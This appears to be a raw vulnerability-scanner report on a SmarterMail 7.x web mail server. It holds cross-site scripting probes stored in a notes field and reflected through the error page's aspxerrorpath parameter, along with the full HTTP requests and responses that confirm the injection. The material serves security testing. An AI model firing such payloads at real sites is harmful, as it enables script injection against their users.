<div id="ctl00_SearchRow" class="SearchRow" style="display:none;">
<table class="SearchContents">
<tr>
<td class="SCText">
Search
<input name="ctl00$SPH$txtSearchString" type="text" id="ctl00_SPH_txtSearchString" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});" />
<select name="ctl00$SPH$lstColors" id="ctl00_SPH_lstColors" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option value="">All Colors</option>
<option value="white">White</option>
<option value="yellow">Yellow</option>
<option value="pink">Pink</option>
<option value="green">Green</option>
<option value="blue">Blue</option>
</select>
<select name="ctl00$SPH$lstCategories" id="ctl00_SPH_lstCategories" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option selected="selected" value="">All Categories</option>
<option value=" ">No Category</option>
<option value="1">1</option>
</select>
</td>
<td class="SCButtons">
<div id="ctl00_SPH_btnGo" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$SPH$btnGo',''); return false;"><span class="BBInner">Find Now</span></a></div>
<script type="text/javascript">
window.setInterval("if (invalid) { invalid = false; Refresh(); }", 333);
function Refresh() { __doPostBack('ctl00$SPH$btnGo',''); }
function ClearText()
{
var el = document.getElementById('ctl00_SPH_txtSearchString');
if (el) el.value = "";
el = document.getElementById('ctl00_SPH_lstCategories');
if (el) el.selectedIndex = 0;
el = document.getElementById('ctl00_SPH_lstColors');
if (el) el.selectedIndex = 0;
}
function DoubleClick(newUrl, uid, isNew)
{
OpenUniqueNewMessage(newUrl, 600, 500, uid);
}
</script>
<div id="ctl00_SPH_btnClear" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false;"><span class="BBInner">Clear</span></a></div><script type='text/javascript'>ToggleSearchClear = function() { ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false; }</script>
</td>
</tr>
</table>
</div>
<span id="ctl00_UpdatePanel1">
</span>
<div id="Scrollable" class="ContentDiv">
<span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div id="ctl00_MPH_UP1">
<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="SmallImage" style="overflow: hidden"> </th><th scope="col" class="leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=text')">Note</a></th><th scope="col" class="rc leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=realdate')">Date<img src='/App_Themes/Default/Images/Misc/down.gif' /></a></th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NzMxMzc4MDNmMzQ5NDBlZWFjNTI2ZTViZmMxYzg5MTE-" name="ctl00_MPH_HyperGrid1_CB64_NzMxMzc4MDNmMzQ5NDBlZWFjNTI2ZTViZmMxYzg5MTE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZmE3NGZjMWRhMjI5NDJlMTliMmI4YzI0Nzc1ZGY5ZDU-" name="ctl00_MPH_HyperGrid1_CB64_ZmE3NGZjMWRhMjI5NDJlMTliMmI4YzI0Nzc1ZGY5ZDU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MzA1ZTg5YzI5MWYzNDYxMThiMzA2NDI3N2EwYTdiM2I-" name="ctl00_MPH_HyperGrid1_CB64_MzA1ZTg5YzI5MWYzNDYxMThiMzA2NDI3N2EwYTdiM2I-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">'"--><script>netsparker(0x009584)</script></td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YzQwYWU0NWNmZWIxNGIzNTg0YTNhNDI2ZGY3MzBhN2Q-" name="ctl00_MPH_HyperGrid1_CB64_YzQwYWU0NWNmZWIxNGIzNTg0YTNhNDI2ZGY3MzBhN2Q-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YzcyY2MwNmYzZDAyNDU5MmFkNTBkMDY5ZDZmOTFiNDM-" name="ctl00_MPH_HyperGrid1_CB64_YzcyY2MwNmYzZDAyNDU5MmFkNTBkMDY5ZDZmOTFiNDM-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZWMyNmNiMzM1YzY3NDJmMDliMjMyYzVlYjgxYTQ2ODU-" name="ctl00_MPH_HyperGrid1_CB64_ZWMyNmNiMzM1YzY3NDJmMDliMjMyYzVlYjgxYTQ2ODU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZGVjNjA3YTkzZjc5NDc2NGIwNmZkMDYyZWJjYThhMGY-" name="ctl00_MPH_HyperGrid1_CB64_ZGVjNjA3YTkzZjc5NDc2NGIwNmZkMDYyZWJjYThhMGY-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MmU4NTI1NGZkNzVlNDgxNDlmNjViNjZjZTM0NDY4YzE-" name="ctl00_MPH_HyperGrid1_CB64_MmU4NTI1NGZkNzVlNDgxNDlmNjViNjZjZTM0NDY4YzE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></..
|
- /UserControls/Popups/frmDeviceSync.aspx
/UserControls/Popups/frmDeviceSync.aspx CONFIRMED |
Injection URL
http://vulnerable.smartermail.7.x.host:9998/frmError.aspx?aspxerrorpath=/Main/Alerts/frmAlert.aspx/%22ns=%22netsparker(0x0038D2)
Injection Request
GET /frmError.aspx?aspxerrorpath=/Main/Alerts/frmAlert.aspx/%22ns=%22netsparker(0x0038D2) HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/Alerts/frmAlert.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/Alerts/frmAlert.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Identification Request
GET /UserControls/Popups/frmDeviceSync.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://vulnerable.smartermail.7.x.host:9998/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Injection Response
HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 02:42:31 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2332
Connection: Close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" class="Error">
<head id="ctl00_Head1"><title>
Message - hoytllc.com - SmarterMail
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Error/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="Error" dir="ltr">
<form method="post" action="frmError.aspx?aspxerrorpath=%2fMain%2fAlerts%2ffrmAlert.aspx%2f%22ns%3d%22netsparker(0x0038D2)" id="aspnetForm" class="Error">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMTE0MTI3MTY2DxYGHghfX19UaXRsZQUHTWVzc2FnZR4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWBAIDDw8WAh4EVGV4dAVSJiN4MkY7TWFpbiYjeDJGO0FsZXJ0cyYjeDJGO2ZybUFsZXJ0LmFzcHgmI3gyRjsmcXVvdDtucz0mcXVvdDtuZXRzcGFya2VyKDB4MDAzOEQyKWRkAgcPDxYCHwMFI1BhZ2Ugbm90IGZvdW5kIG9yIHVua25vd24gZXhjZXB0aW9uZGRkhR1wEqGoaoye4+rEy/25HTG4hDw=" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
</script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls([], [], [], 90);
//]]>
</script>
<div class="CenteredError">
<div class="ShadowBox">
<div class="ErrorBox">
<div class="ErrorTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="ErrorTitleText">
An Error Occurred
</div>
</div>
</div>
</div>
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div class="ErrorSpacer">
</div>
<div class="ErrorContent">
<div class="ErrorSetting">
<div class="ErrorLabel">
Page:
</div>
<span id="ctl00_MPH_lblPageName">/Main/Alerts/frmAlert.aspx/"ns="netsparker(0x0038D2)</span>
</div>
<div class="ErrorSetting">
<div class="ErrorLabel">
Message
</div>
<span id="ctl00_MPH_lblError">Page not found or unknown exception</span>
</div>
</div>
<div class="ErrorButtons">
<div class="ErrorButtonsLeft">
</div>
<div id="ctl00_BrPH_BackIcon" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BrPH$BackIcon',''); return false;"><span class="BBInner">Back</span></a></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
UpdateSidebarCounts('UserSync', 0);
Sys.Application.initialize();
//]]>
</script>
</form>
</body>
</html>
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 02:42:31 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2332
Connection: Close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" class="Error">
<head id="ctl00_Head1"><title>
Message - hoytllc.com - SmarterMail
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Error/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="Error" dir="ltr">
<form method="post" action="frmError.aspx?aspxerrorpath=%2fMain%2fAlerts%2ffrmAlert.aspx%2f%22ns%3d%22netsparker(0x0038D2)" id="aspnetForm" class="Error">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMTE0MTI3MTY2DxYGHghfX19UaXRsZQUHTWVzc2FnZR4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWBAIDDw8WAh4EVGV4dAVSJiN4MkY7TWFpbiYjeDJGO0FsZXJ0cyYjeDJGO2ZybUFsZXJ0LmFzcHgmI3gyRjsmcXVvdDtucz0mcXVvdDtuZXRzcGFya2VyKDB4MDAzOEQyKWRkAgcPDxYCHwMFI1BhZ2Ugbm90IGZvdW5kIG9yIHVua25vd24gZXhjZXB0aW9uZGRkhR1wEqGoaoye4+rEy/25HTG4hDw=" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
</script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls([], [], [], 90);
//]]>
</script>
<div class="CenteredError">
<div class="ShadowBox">
<div class="ErrorBox">
<div class="ErrorTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="ErrorTitleText">
An Error Occurred
</div>
</div>
</div>
</div>
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div class="ErrorSpacer">
</div>
<div class="ErrorContent">
<div class="ErrorSetting">
<div class="ErrorLabel">
Page:
</div>
<span id="ctl00_MPH_lblPageName">/Main/Alerts/frmAlert.aspx/"ns="netsparker(0x0038D2)</span>
</div>
<div class="ErrorSetting">
<div class="ErrorLabel">
Message
</div>
<span id="ctl00_MPH_lblError">Page not found or unknown exception</span>
</div>
</div>
<div class="ErrorButtons">
<div class="ErrorButtonsLeft">
</div>
<div id="ctl00_BrPH_BackIcon" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BrPH$BackIcon',''); return false;"><span class="BBInner">Back</span></a></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
UpdateSidebarCounts('UserSync', 0);
Sys.Application.initialize();
//]]>
</script>
</form>
</body>
</html>
Identification Response
HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:57:15 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 327169
Connection: Close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="ctl00_head1"><title>
Synchronization Center
</title><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Popup/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="innerpopup" dir="ltr">
<form method="post" action="frmDeviceSync.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTkxNjAzNDgyNg8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWBgIHD2QWAmYPZBYCAgEPFgIeB1Zpc2libGVoFgICAQ8WAh4EVGV4dGVkAgsPZBYEAgEPZBYCAgMPFgIfAwUHTWVzc2FnZWQCAw9kFgYCAg9kFgICAQ9kFgQCAQ9kFgICAQ9kFg4CAw9kFgRmDw8WAh8DBQ1pUG9kIC8gaVBob25lZGQCAQ8PFgIeCEltYWdlVXJsBTxodHRwOi8vaW1hZ2VzLnNtYXJ0ZXJ0b29scy5jb20vc21hcnRlcm1haWwvdjcvaWNvbl9hcHBsZS5wbmdkZAIED2QWBGYPDxYCHwMFBGlQYWRkZAIBDw8WAh8EBTxodHRwOi8vaW1hZ2VzLnNtYXJ0ZXJ0b29scy5jb20vc21hcnRlcm1haWwvdjcvaWNvbl9hcHBsZS5wbmdkZAIFD2QWBGYPDxYCHwMFCkJsYWNrQmVycnlkZAIBDw8WAh8EBUFodHRwOi8vaW1hZ2VzLnNtYXJ0ZXJ0b29scy5jb20vc21hcnRlcm1haWwvdjcvaWNvbl9ibGFja2JlcnJ5LnBuZ2RkAgYPZBYEZg8PFgIfAwUHQW5kcm9pZGRkAgEPDxYCHwQFPGh0dHA6Ly9pbWFnZXMuc21hcnRlcnRvb2xzLmNvbS9zbWFydGVybWFpbC92Ny9pY29uX2Ryb2lkLnBuZ2RkAgcPZBYEZg8PFgIfAwUOV2luZG93cyBNb2JpbGVkZAIBDw8WAh8EBT5odHRwOi8vaW1hZ2VzLnNtYXJ0ZXJ0b29scy5jb20vc21hcnRlcm1haWwvdjcvaWNvbl93aW5kb3dzLnBuZ2RkAggPZBYEZg8PFgIfAwUFTm9raWFkZAIBDw8WAh8EBTxodHRwOi8vaW1hZ2VzLnNtYXJ0ZXJ0b29scy5jb20vc21hcnRlcm1haWwvdjcvaWNvbl9ub2tpYS5wbmdkZAIJD2QWBGYPDxYCHwMFBFBhbG1kZAIBDw8WAh8EBTtodHRwOi8vaW1hZ2VzLnNtYXJ0ZXJ0b29scy5jb20vc21hcnRlcm1haWwvdjcvaWNvbl9wYWxtLnBuZ2RkAgMPZBYCAgEPZBYCZg9kFgICAQ8WAh8DBf8aPGRpdiBjbGFzcz0nRGV2aWNlV3JhcHBlcic+PGRpdiBjbGFzcz0nRGV2aWNlTmFtZSc+QXBwbGUgaVBvZCBhbmQgaVBob25lPC9kaXY+PGRpdiBjbGFzcz0nRGV2aWNlRGVzY3JpcHRpb24nPlRoZSBBcHBsZSBpUG9kIGlzIGEgcG9ydGFibGUgbWVkaWEgcGxheWVyLiBEZXBlbmRpbmcgb24gdGhlIG1vZGVsLCB0aGUgaVBvZCBtYXkgaGF2ZSB2aWRlbywgdG91Y2gtc2NyZWVuLCBhbmQvb3IgSW50ZXJuZXQgY2FwYWJpbGl0aWVzLiBUaGUgQXBwbGUgaVBob25lIGlzIGEgR1NNIGNlbGwgcGhvbmUgdGhhdCdzIGFsc28gYW4gaVBvZCwgYSB2aWRlbyBjYW1lcmEsIGFuZCBhIG1vYmlsZSBJbnRlcm5ldCBkZXZpY2Ugd2l0aCBlbWFpbCBhbmQgR1BTIG1hcHMuIEZvciBtb3JlIGluZm9ybWF0aW9uIG9uIHRoZXNlIGRldmljZXMsIHZpc2l0IDxhIGhyZWY9Imh0dHA6Ly93d3cuYXBwbGUuY29tICIgdGFyZ2V0PSJfYmxhbmsiPnd3dy5hcHBsZS5jb208L2E+LjwvZGl2PjxkaXYgY2xhc3M9J0RldmljZUNhcGFiaWxpdGllcyc+U3luY2hyb25pemVzOiBBcHBvaW50bWVudHMsIENvbnRhY3RzLCBFbWFpbCwgVGFza3M8L2Rpdj48ZGl2IGNsYXNzPSdQcm90b2NvbFdyYXBwZXInPjxkaXYgY2xhc3M9J1Byb3RvY29sTmFtZSc+TWljcm9zb2Z0IEV4Y2hhbmdlIEFjdGl2ZVN5bmM8L2Rpdj48ZGl2IGNsYXNzPSdQcm90b2NvbERlc2NyaXB0aW9uJz5NaWNyb3NvZnQgRXhjaGFuZ2UgQWN0aXZlU3luYyBpcyBhbiBvcHRpb25hbCBhZGQtb24gdGhhdCBzeW5jcyBTbWFydGVyTWFpbCBtYWlsYm94ZXMgd2l0aCBtb3N0IG1vYmlsZSBkZXZpY2VzIGFuZCBzbWFydHBob25lcy4gVGhlIEV4Y2hhbmdlIEFjdGl2ZVN5bmMgYWRkLW9uIGlzIHRoZSBvbmx5IHN5bmNocm9uaXphdGlvbiBtZXRob2QgdGhhdCB1c2VzIGRpcmVjdCBwdXNoIHRlY2hub2xvZ3kgdG8gc3luYyBjb2xsYWJvcmF0aW9uIGl0ZW1zIGluIHJlYWwgdGltZSwgZW5zdXJpbmcgYW55IGNoYW5nZXMgYXJlIGF1dG9tYXRpY2FsbHkgcmVjb3JkZWQgaW4gYm90aCBTbWFydGVyTWFpbCBhbmQgdGhlIG1vYmlsZSBkZXZpY2UuPC9kaXY+PGRpdiBjbGFzcz0nUHJvdG9jb2xEZXNjcmlwdGlvbic+VXNpbmcgdGhlIEV4Y2hhbmdlIEFjdGl2ZVN5bmMgYWRkLW9uLCB5b3UgY2FuIHN5bmMgdGhlIGZvbGxvd2luZyBjb2xsYWJvcmF0aW9uIGl0ZW1zIHdpdGggdGhlIGlQb2QvaVBob25lOiBlbWFpbCwgY2FsZW5kYXJzLCBhbmQgY29udGFjdHMuPC9kaXY+PGRpdiBjbGFzcz0nUHJvdG9jb2xTdGF0dXMnPk1pY3Jvc29mdCBFeGNoYW5n